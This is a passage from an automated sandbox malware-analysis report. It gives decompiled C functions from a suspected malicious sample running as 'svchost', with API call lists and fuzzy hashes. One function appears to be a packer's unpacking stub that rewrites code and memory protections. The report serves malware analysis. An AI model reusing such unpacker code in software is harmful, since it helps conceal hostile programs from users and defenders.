    				_t5 = E004147A0(_t10, _t10);
    				 *_v4 = _t5;
    				return _t5;
    			}

    APIs
      • Part of subcall function 00416160: WSAStartup.WS2_32(00000101,?), ref: 0041617D
    • gethostname.WS2_32(00000000,00000010), ref: 0040B499
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Startupgethostname
    • String ID: ^I
    • API String ID: 615715795-3473481074
    • Opcode ID: aced9dd3c3598f0d29637c94b4bf502a7545c8241c7e732b69d6e68389bc6501
    • Instruction ID: e6f4dec794ddf1a22c407997bf8dd5ec839df19e271f864c85946bdb79e088ca
    • Opcode Fuzzy Hash: aced9dd3c3598f0d29637c94b4bf502a7545c8241c7e732b69d6e68389bc6501
    • Instruction Fuzzy Hash: 54E08678418380ABC304EB74840579B7B99ABD5324F848E5DF195462D2D7BCC448C7AB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041B040(int _a4) {
    
    				E00418600(0x4c93b0, _a4); // executed
    				ExitProcess(_a4);
    			}

    APIs
      • Part of subcall function 00418600: GetCurrentThreadId.KERNEL32 ref: 00418625
      • Part of subcall function 00418600: IsWindow.USER32(?), ref: 00418641
      • Part of subcall function 00418600: SendMessageA.USER32(?,000083E7,?,00000000), ref: 0041865A
      • Part of subcall function 00418600: ExitProcess.KERNEL32 ref: 0041866F
    • ExitProcess.KERNEL32 ref: 0041B055
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExitProcess$CurrentMessageSendThreadWindow
    • String ID: ^I
    • API String ID: 821200049-3473481074
    • Opcode ID: e8f63f49525e361e834760cf8ff17fc70b173e05076e5d784c61bbcf6d7e3302
    • Instruction ID: ca6fd0273a9ac620a5c064f6b42f5121db51dd7d8b2ea8d00eefcf8b29fb6245
    • Opcode Fuzzy Hash: e8f63f49525e361e834760cf8ff17fc70b173e05076e5d784c61bbcf6d7e3302
    • Instruction Fuzzy Hash: 7AC04C75110208BB8744AF99C855D9A379D9B48740700812DBA0587251CF78E98087EE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 48%
    			E0050AC53(void* __eax, void* __edx, intOrPtr* __esi, void* __eflags) {
    				CHAR* _v8;
    				intOrPtr* _v24;
    				struct _STARTUPINFOA _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v807;
    				char _v811;
    				char _v815;
    				intOrPtr _v819;
    				char _v867;
    				char _v891;
    				char _v915;
    				char _v935;
    				char _v943;
    				char _v983;
    				char _v999;
    				int _t58;
    				unsigned int _t64;
    				signed int _t76;
    				void* _t86;
    				long _t94;
    				void* _t97;
    				void* _t98;
    				unsigned short _t100;
    				unsigned short _t104;
    				void* _t112;
    				long* _t114;
    				long _t115;
    				void* _t116;
    				long* _t117;
    				void* _t118;
    				intOrPtr* _t119;
    				void* _t120;
    				void* _t121;
    				intOrPtr _t122;
    				void* _t125;
    				intOrPtr* _t129;
    				signed int _t133;
    				unsigned int _t146;
    				long _t147;
    				void* _t149;
    				long* _t150;
    				intOrPtr _t151;
    				long _t154;
    				void* _t156;
    				long _t159;
    				void* _t160;
    				void* _t161;
    				long _t165;
    				long _t167;
    				intOrPtr* _t168;
    				intOrPtr* _t169;
    				long _t171;
    				DWORD* _t174;
    				void* _t175;
    				void* _t176;
    				long _t178;
    				long _t180;
    				void* _t183;
    				intOrPtr _t185;
    
    				_t168 = __esi;
    				_t149 = __edx;
    				_pop(_t112);
    				E0050AF13(__eflags, _t112 + 0x368, __eax);
    				asm("popad");
    				_t169 =  *_t168;
    				_t1 =  &_v999; // 0xe300000
    				_t159 = _t183 +  *_t1;
    				_t114 = _t159;
    				if( *_t159 != 0) {
    					_t160 = _t159 +  *_t114;
    					_t115 =  &(_t114[1]);
    					__eflags = _t115;
    					L11:
    					__eflags =  *_t115;
    					if( *_t115 != 0) {
    						 *_t115 =  *_t115 + _t149;
    						_t167 = _t160 +  *((intOrPtr*)(_t115 + 4));
    						__eflags = _t167;
    						goto L13;
    					}
    				} else {
    					__edi = __edi + 4;
    					__ecx = 0;
    					L13:
    					_t16 =  &_v811; // 0x74
    					_t17 =  &_v815; // 0x713a1074
    					_t18 =  &_v943; // 0x40100000
    					 *((intOrPtr*)( *_t18 + 0x5a9))( *_t17,  *_t16, 1, _t167); // executed
    					_pop(_t125);
    					_pop(_t149);
    					1 = _t115;
    					_t160 = _t149;
    					__eflags = 1;
    					if(1 != 0) {
    						_t115 = _t125 + 8;
    						goto L11;
    					}
    				}
    				_t19 =  &_v943; // 0x40100000, executed
    				_t58 = VirtualFree( *_t19, 0, 0x8000);
    				_t21 =  &_v935; // 0x50a83f
    				_t170 = _t21;
    				_t22 =  &(_t170[2]); // 0x11e00
    				_t23 =  &(_t170[4]); // 0x50a84f
    				_t150 = _t23;
    				_t171 =  *_t21;
    				_t159 = _t171;
    				__eflags =  *_t22;
    				if( *_t22 != 0) {
    					goto L16;
    					do {
    						do {
    							L16:
    							_t98 =  *_t159;
    							_t159 = _t159 + 1;
    							__eflags = _t98 - 0xe8 - 1;
    						} while (_t98 - 0xe8 > 1);
    						_t100 =  *_t159;
    						__eflags = _t150[0];
    						if(_t150[0] == 0) {
    							_t122 =  *((intOrPtr*)(_t159 + 4));
    							asm("rol eax, 0x10");
    							_t104 = _t100;
    						} else {
    							goto L18;
    						}
    						L21:
    						 *_t159 = _t104 - _t159 + _t171;
    						_t159 = _t159 + 5;
    						_t58 = _t122 - 0xe8;
    						asm("loop 0xffffffc8");
    						goto L22;
    						L18:
    						__eflags =  *_t159 -  *_t150;
    					} while ( *_t159 !=  *_t150);
    					_t122 =  *((intOrPtr*)(_t159 + 4));
    					asm("rol eax, 0x10");
    					_t104 = _t100 >> 8;
    					goto L21;
    				}
    				L22:
    				E0050AE69(_t58);
    				_t30 =  &_v915; // 0x50a853
    				_t129 = _t30;
    				_t31 = _t129 + 8; // 0x0
    				__eflags =  *_t31;
    				if( *_t31 != 0) {
    					_t32 = _t129 + 0x10; // 0x0
    					_t178 = _t150 -  *_t32;
    					__eflags = _t178;
    					if(_t178 != 0) {
    						 *(_t129 + 0x10) = _t178;
    						_t34 =  &_v867; // 0x50a883
    						_t180 =  *_t34;
    						_t35 = _t180 - 4; // 0x489f5fc
    						_t119 = _t35;
    						__eflags =  *_t129 - 1;
    						if( *_t129 == 1) {
    							_t38 = _t129 + 8; // 0x0
    							_t165 = _t180 +  *_t38;
    							__eflags = _t165;
    							_t39 = _t129 + 0x10; // 0x0
    							_t146 =  *_t39;
    						} else {
    							_t36 = _t129 + 8; // 0x0
    							_t165 = _t150 +  *_t36;
    							_t37 = _t129 + 0x10; // 0x0
    							_t146 =  *_t37;
    						}
    						while(1) {
    							_t165 = _t165 + 1;
    							_t93 = 0;
    							__eflags = 0;
    							if(0 == 0) {
    								break;
    							}
    							__eflags = 0 - 0xef;
    							if(0 > 0xef) {
    								_t97 =  *_t165;
    								_t165 = _t165 + 2;
    								_t93 = _t97;
    								__eflags = 0;
    								if(0 == 0) {
    									_t93 =  *_t165;
    									_t165 = _t165 + 4;
    								}
    							}
    							_t119 = _t119 + _t93;
    							 *_t119 =  *_t119 + _t146;
    						}
    						_t120 = 0;
    						_t159 = _t180;
    						_t94 =  *_t165;
    						__eflags = _t94;
    						if(_t94 != 0) {
    							while(1) {
    								asm("lodsd");
    								_t94 = _t94;
    								__eflags = _t94;
    								if(_t94 == 0) {
    									break;
    								}
    								_t120 = _t120 + _t94;
    								 *((intOrPtr*)(_t159 + _t120)) =  *((intOrPtr*)(_t159 + _t120)) + _t146;
    							}
    							_t121 = 0;
    							_t147 = _t146 >> 0x10;
    							__eflags = _t147;
    							while(1) {
    								asm("lodsd");
    								_t94 = _t94;
    								__eflags = _t94;
    								if(_t94 == 0) {
    									goto L38;
    								}
    								_t121 = _t121 + _t94;
    								 *((intOrPtr*)(_t159 + _t121)) =  *((intOrPtr*)(_t159 + _t121)) + _t147;
    							}
    						}
    					}
    				}
    				L38:
    				_t45 =  &_v983; // 0x50a80f
    				_t151 =  *_t45;
    				_t46 =  &_v891; // 0x50a86b
    				_t169 = _t46;
    				__eflags =  *_t169 - 1;
    				if( *_t169 != 1) {
    					L41:
    					_t116 = _t183;
    					_t114 = _t116 - 0x21;
    					__eflags =  *_t114;
    					if( *_t114 != 0) {
    						_t117 =  &(_t114[0]);
    						_t51 =  &_v983; // 0x50a80f
    						_t174 = _t51;
    						_t154 =  *_t174;
    						_push(_t174);
    						_push(0);
    						_t52 =  &(_t117[1]); // 0x200
    						_t53 =  &(_t117[2]); // 0x163e000
    						VirtualProtect( *_t53 + _t154,  *_t52,  *_t117, _t174);
    						_t118 = _t154;
    						_t169 = _t117;
    						_t114 = _t118 + 0xc;
    						asm("loop 0xffffffe3");
    					}
    					__eflags = 0;
    					if(0 == 0) {
    						asm("popad");
    						asm("popfd");
    						_push(_t183);
    						_push(0xffffffff);
    						_push(0x49d6f8);
    						_push(E00472CF4);
    						_push( *[fs:0x0]);
    						 *[fs:0x0] = _t185;
    						_push(_t114);
    						_push(_t169);
    						_push(_t159);
    						_v24 = _t185 - 0x58;
    						_t64 = GetVersion();
    						 *0x4e1804 = 0;
    						_t133 = _t64 & 0x000000ff;
    						 *0x4e1800 = _t133;
    						 *0x4e17fc = _t133 << 8;
    						 *0x4e17f8 = _t64 >> 0x10;
    						if(E00474E11(_t133 << 8, 1) == 0) {
    							E0046FE89(0x1c);
    						}
    						if(E00474BCE() == 0) {
    							E0046FE89(0x10);
    						}
    						_v8 = 0;
    						E00474A12();
    						 *0x4e2fe4 = GetCommandLineA();
    						 *0x4e1770 = E004748E0();
    						E00474693();
    						E004745DA();
    						E00473896();
    						_v96.dwFlags = 0;
    						GetStartupInfoA( &_v96);
    						_v104 = E00474582();
    						_t191 = _v96.dwFlags & 0x00000001;
    						if((_v96.dwFlags & 0x00000001) == 0) {
    							_t76 = 0xa;
    						} else {
    							_t76 = _v96.wShowWindow & 0x0000ffff;
    						}
    						_v100 = E00480D6E(GetModuleHandleA(0), 0, _v104, _t76);
    						E004738C3(_t78);
    						_v108 =  *((intOrPtr*)( *_v24));
    						return E0047440A(_t159, _t191,  *((intOrPtr*)( *_v24)), _v24);
    					} else {
    						asm("popad");
    						asm("popfd");
    						return 1;
    					}
    				} else {
    					_t47 = _t169 + 4; // 0x1569c00
    					_t156 = _t151 +  *_t47;
    					_t86 = _v819(4, _t169, _t156, _t169);
    					_t161 = _t156;
    					_t175 = 0x100;
    					__eflags = _t86 - 1;
    					if(_t86 != 1) {
    						return _v807(0);
    					} else {
    						_t176 = _t175 + 8;
    						memcpy(_t161, _t176, 8);
    						_t185 = _t185 + 0xc;
    						_t169 = _t176 - 0xc;
    						_t159 = _t176 + 0x10 - 8;
    						__eflags = _t159;
    						_v819(_t159, 0x100,  *((intOrPtr*)(_t169 - 4)), _t169);
    						goto L41;
    					}
    				}
    			}


    APIs
    • VirtualFree.KERNELBASE(40100000,00000000,00008000,0050AC53,00000000), ref: 0050ACD0
    • VirtualProtect.KERNELBASE(0163E000,00000200,0050ABC6,0050A80F,?,0050ABC6,00000000,0050A80F), ref: 0050AE3F
    Memory Dump Source
    • Source File: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 0321e99b05351837c07c5a3f9419d667d8787c5608cbbedf329a53786f235210
    • Instruction ID: c7b8536cab105c3d62b6f180d80e01ca0b83acf16b7f1fe13d287a1efe5aa3e0
    • Opcode Fuzzy Hash: 0321e99b05351837c07c5a3f9419d667d8787c5608cbbedf329a53786f235210
    • Instruction Fuzzy Hash: 3F61F8336043119FEB268E18CC847EDBB75FF95310F2945A4D4859B2C1D771AE82CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E004839C2(void* __ecx, CHAR* _a4, signed int _a8, intOrPtr _a12) {
    				struct _SECURITY_ATTRIBUTES _v16;
    				char _v276;
    				void* __esi;
    				void* __ebp;
    				signed int _t32;
    				signed int _t34;
    				long _t35;
    				void* _t36;
    				intOrPtr _t40;
    				void* _t42;
    				signed int _t45;
    				long _t49;
    				signed int _t57;
    				long _t58;
    				void* _t63;
    				intOrPtr _t64;
    
    				_t63 = __ecx;
    				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
    				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
    				_t44 = __ecx + 0xc;
    				_t57 = _a8 & 0xffff7fff;
    				E0048324D(__ecx + 0xc, __ecx);
    				_push(_a4);
    				_push( &_v276); // executed
    				E00483CEE(); // executed
    				E004833FF(_t44,  &_v276);
    				_t49 = 0;
    				_t32 = _t57 & 0x00000003;
    				if(_t32 == 0) {
    					_t49 = 0x80000000;
    				} else {
    					_t42 = _t32 - 1;
    					if(_t42 == 0) {
    						_t49 = 0x40000000;
    					} else {
    						if(_t42 == 1) {
    							_t49 = 0xc0000000;
    						}
    					}
    				}
    				_t34 = _t57 & 0x00000070;
    				_t45 = 1;
    				if(_t34 == 0 || _t34 == 0x10) {
    					L15:
    					_t35 = 0;
    					goto L16;
    				} else {
    					if(_t34 == 0x20) {
    						_t35 = _t45;
    						L16:
    						_v16.lpSecurityDescriptor = _v16.lpSecurityDescriptor & 0x00000000;
    						_v16.nLength = 0xc;
    						_v16.bInheritHandle =  !_t57 >> 0x00000007 & _t45;
    						if((_t57 & 0x00001000) == 0) {
    							_t58 = 3;
    						} else {
    							asm("sbb edi, edi");
    							_t58 = ( ~(_t57 & 0x00002000) & 0x00000002) + 2;
    						}
    						_t36 = CreateFileA(_a4, _t49, _t35,  &_v16, _t58, 0x80, 0); // executed
    						if(_t36 != 0xffffffff) {
    							 *(_t63 + 4) = _t36;
    							 *(_t63 + 8) = _t45;
    							return _t45;
    						} else {
    							_t64 = _a12;
    							if(_t64 != 0) {
    								 *((intOrPtr*)(_t64 + 0xc)) = GetLastError();
    								_t40 = E0048877E(_t39);
    								_t21 = _t64 + 0x10; // 0x10
    								 *((intOrPtr*)(_t64 + 8)) = _t40;
    								E004833FF(_t21, _a4);
    							}
    							return 0;
    						}
    					}
    					if(_t34 == 0x30) {
    						_push(2);
    						L12:
    						_pop(_t35);
    						goto L16;
    					}
    					if(_t34 != 0x40) {
    						goto L15;
    					}
    					_push(3);
    					goto L12;
    				}
    			}


    APIs
      • Part of subcall function 00483CEE: __EH_prolog.LIBCMT ref: 00483CF3
      • Part of subcall function 00483CEE: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00483D11
      • Part of subcall function 00483CEE: lstrcpyn.KERNEL32(?,?,00000104), ref: 00483D20
    • CreateFileA.KERNELBASE(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,?), ref: 00483A9D
    • GetLastError.KERNEL32 ref: 00483AAF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpyn
    • String ID:
    • API String ID: 1034715445-0
    • Opcode ID: e09936e4ed554b855c3766f0d16a19887f6df69778bc150ed784a248a6f3376a
    • Instruction ID: 90d31c71ac07ec01886b4748eb17e1da0538fda55a1a5f92b851c5f8087d021c
    • Opcode Fuzzy Hash: e09936e4ed554b855c3766f0d16a19887f6df69778bc150ed784a248a6f3376a
    • Instruction Fuzzy Hash: 29310A32A00205ABDB28BE65CC45B6F7795AB80B15F208D2FE496D72C0C678DB458718
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040B7F0(void* __ecx, void* _a4) {
    				void* _t8;
    				void* _t10;
    				char _t11;
    				intOrPtr* _t17;
    				signed int _t19;
    				void* _t21;
    				intOrPtr _t22;
    
    				_t21 = _a4;
    				if(_t21 == 0) {
    					return _t8;
    				} else {
    					_t22 =  *((intOrPtr*)(__ecx + 4));
    					if(_t21 < _t22 + 0x64) {
    						L4:
    						_t10 =  *0x4c938c; // 0xae0000
    						if(_t10 == 0) {
    							_t10 = GetProcessHeap();
    							 *0x4c938c = _t10;
    						}
    						_t11 = RtlFreeHeap(_t10, 0, _t21); // executed
    						return _t11;
    					}
    					_t19 = _t22 + 0xc064;
    					if(_t21 >= _t19) {
    						goto L4;
    					}
    					asm("cdq");
    					 *((char*)((_t21 - _t22 - 0x64 + (_t19 & 0x000001ff) >> 9) + _t22 + 4)) = 0;
    					_t17 =  *((intOrPtr*)(__ecx + 4));
    					 *_t17 =  *_t17 - 1;
    					return _t17;
    				}
    			}


    APIs
    • GetProcessHeap.KERNEL32(00000000,?,0040B788,?,?,?,?,0040B606,00000000,?,?,?,0040AC22,?,000007DB), ref: 0040B839
    • RtlFreeHeap.NTDLL(00AE0000,00000000,?,00000000,?,0040B788,?,?,?,?,0040B606,00000000,?,?,?,0040AC22), ref: 0040B848
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Heap$FreeProcess
    • String ID:
    • API String ID: 3859560861-0
    • Opcode ID: 10fb91eb9a2f86244f231c03722d7d67a812bc2f9eefe05091d941b5eb209d58
    • Instruction ID: 76ceab559b4649bf2cb0c9a6734bf3dffa2804919c9e01fc0aa929cb8f7d74a6
    • Opcode Fuzzy Hash: 10fb91eb9a2f86244f231c03722d7d67a812bc2f9eefe05091d941b5eb209d58
    • Instruction Fuzzy Hash: FAF062372002419BC7109B29D908B867BAAEBE1B15F19C47BD4449B2A4D771E801C7EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048D4A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				signed short _t13;
    				void* _t16;
    				intOrPtr _t18;
    				void* _t20;
    				intOrPtr _t29;
    
    				_t13 = SetErrorMode(0); // executed
    				SetErrorMode(_t13 | 0x00008001); // executed
    				_t16 = E0048C6BF();
    				_t29 = _a4;
    				 *((intOrPtr*)(_t16 + 8)) = _t29;
    				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
    				_t18 =  *((intOrPtr*)(E0048C6BF() + 4));
    				_t31 = _t18;
    				if(_t18 != 0) {
    					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
    					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
    					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
    					 *((intOrPtr*)(_t18 + 0x74)) = _a16;
    					E0048D506(_t18, _t31);
    				}
    				if( *((char*)(E0048C6BF() + 0x14)) == 0) {
    					E00487FCD();
    				}
    				_t20 = 1;
    				return _t20;
    			}


    APIs
    • SetErrorMode.KERNELBASE(00000000,00000000,0048927B,00000000,00000000,00000000,00000000,?,00000000,?,00480D83,00000000,00000000,00000000,00000000,0046FE3C), ref: 0048D4AC
    • SetErrorMode.KERNELBASE(00000000,?,00000000,?,00480D83,00000000,00000000,00000000,00000000,0046FE3C,00000000), ref: 0048D4B3
      • Part of subcall function 0048D506: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0048D537
      • Part of subcall function 0048D506: lstrcpy.KERNEL32(?,.HLP), ref: 0048D5D8
      • Part of subcall function 0048D506: lstrcat.KERNEL32(?,.INI), ref: 0048D605
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
    • String ID:
    • API String ID: 3389432936-0
    • Opcode ID: c588f002ca401c758721d2f9aeb8aa99f4f8a130664e07be84c8bb813b420aaf
    • Instruction ID: 71707f7a55a04aacf7147b9fcc41e7edc759d07429313fe6ae328c6312da06cc
    • Opcode Fuzzy Hash: c588f002ca401c758721d2f9aeb8aa99f4f8a130664e07be84c8bb813b420aaf
    • Instruction Fuzzy Hash: 66F037B49182109FC714FF25D445A0D7BA5AF44724F0588AFF5849B3A2DB78D840CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00474E11(void* __ecx, intOrPtr _a4) {
    				void* _t6;
    				intOrPtr _t8;
    				void* _t9;
    				void* _t10;
    				void* _t12;
    
    				_t12 = __ecx;
    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
    				_t15 = _t6;
    				 *0x4e1c88 = _t6;
    				if(_t6 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t8 = E00474CC9(_t12, _t15);
    					 *0x4e1c8c = _t8;
    					if(_t8 != 3) {
    						__eflags = _t8 - 2;
    						if(_t8 != 2) {
    							goto L8;
    						} else {
    							_t10 = E0047925C();
    							goto L5;
    						}
    					} else {
    						_push(0x3f8);
    						_t10 = E00478715();
    						L5:
    						if(_t10 != 0) {
    							L8:
    							_t9 = 1;
    							return _t9;
    						} else {
    							HeapDestroy( *0x4e1c88);
    							goto L7;
    						}
    					}
    				}
    			}


    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0046FDBA,00000001), ref: 00474E22
      • Part of subcall function 00474CC9: GetVersionExA.KERNEL32 ref: 00474CE8
    • HeapDestroy.KERNEL32 ref: 00474E61
      • Part of subcall function 00478715: RtlAllocateHeap.NTDLL(00000000,00000140,00474E4A), ref: 00478722
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
